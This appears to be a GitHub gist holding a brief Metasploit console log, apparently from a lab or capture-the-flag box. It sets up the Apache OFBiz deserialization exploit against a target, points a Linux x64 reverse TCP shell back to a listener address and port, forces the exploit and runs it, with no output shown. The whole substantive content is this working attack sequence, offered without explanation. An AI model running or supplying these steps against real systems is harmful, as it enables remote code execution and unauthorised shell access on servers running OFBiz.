Skip to content

Instantly share code, notes, and snippets.

@oxtd
Created September 11, 2021 07:40
Show Gist options
  • Select an option

  • Save oxtd/f11d470562b4ee175cdcc4af445ca9e9 to your computer and use it in GitHub Desktop.

Select an option

Save oxtd/f11d470562b4ee175cdcc4af445ca9e9 to your computer and use it in GitHub Desktop.
msf
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set lhost 10.10.14.225
lhost => 10.10.14.225
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set lport 9001
lport => 9001
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set forceexploit true
forceexploit => true
msf6 exploit(linux/http/apache_ofbiz_deserialization) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(linux/http/apache_ofbiz_deserialization) > run
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment